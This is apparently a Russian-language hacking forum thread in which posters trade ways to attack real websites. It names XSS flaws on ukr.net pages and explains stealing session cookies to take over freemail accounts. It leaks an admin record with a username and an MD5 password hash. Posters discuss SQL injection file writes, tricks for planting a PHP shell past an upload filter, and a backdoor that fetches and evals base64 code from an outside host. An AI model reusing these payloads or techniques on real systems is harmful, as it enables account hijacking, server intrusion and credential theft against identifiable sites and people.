Помогите разобраться с XSS вот вроде нашел тут токо хз правильная ли она http://play.ukr.net/videos/search? уязвимое поле поиск кода пишу "><script>alert()</script> сам посмотрите что выдаст)). Это XSS ваще? Если да обесните плиз как ее использывать, а то читаю мануалы не оч понял))
admin_id:admin_name:admin_email:admin_pass:admin_level 1:frandocs:[email protected]:5a042913e5074bc846784dd2066456d2:26:1 5a042913e5074bc846784dd2066456d2 -> md5
Там как уже сказали фильтр, но в таких ситуациях нельзя разочаровываться, по адресу http://freemail.ukr.net/q/password_recovery есть рабочая XSS Code: "><script>alert(/xss/)</script> Что с этим можно сделать? Можно найти более красиваое место, написать там посредством XSS код который будет красть куки, через сниффер, и потом входить на этот сьайт под чужими акками без ввода пароля, ну это в лучшем случае)) Под красивым местом подразумевается статическая страница которую могут открыть люди и оставить там свои куки для тебя P.S. Посредством этой XSS можно взломать(угнать куки) любой аккаунт с freemail.ukr.net, вот что можно с этим сделать))
как сделать select into outfile '/var/www/site/ae.txt' если фильтрируется ' и все это после 400 колонок
я не труъ хакир, но вроде тут нечего не поделаешь, т.к. при записи, нужно указывать путь к файлу именно в ' '. пробуй через двойной запрос.
Столкнулся с проблемой в админке есть функция загрузки картинок в галерею, ресайза нет, но добавляется расширение jpeg, и проверяется mime на image, только в одном случае, когда льешь ex.php.jpeg добавляется ex.txt. В галереи отображается картинка как надо, а когда по прямому пути, то исходник картинки+шелла. Может кто сталкивался, как обойти. p.s. инклуда нет
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ? Попробуй отправить x3k.jpeg.php подделав Content-Type на Image. И вот такие названия пробуй: x3k.php.blablajpg x3k.php%00.jpeg
Четыре расширения в белом списке gif,jpg,jpeg,png. Льешь jpg>jpg на выходе. Подделывал Content-Type на image/jpeg выкинуло ошибку. Нижнии два варианта при первоначальном попадании в админку, не помогли
да, ставиь в пхп модуль (через админку) Code: if($_SERVER['REMOTE_ADDR']="TVOI_IP_VNESHKA") { echo(eval(base64_decode(file_get_contents("http://iahacker.ru/TVOI_BASE64_ENKODIROVANII_SHELL.txt")))); die(); }
что делать пробую залить шелл шелл.пшп.джпег но его в постледствие залива переименовывает на какой нить нв3-1.джпег и он не запускается! как обойти или мож я чето не так делаю??
Как видишь доступна только папка сессий, которая лежит на уровень выше корня сайта, соответственно, можно попытаться бросить шелл туда, а дальше подцепить его инклудом, или имея полный путь попробовать прочитать файл configuration.php через скулю, в этом файле часто бывают акки фтп, кстати configuration.php доступен для записи? P.S. Я уже тоже сталкивался с этим сайтом))))
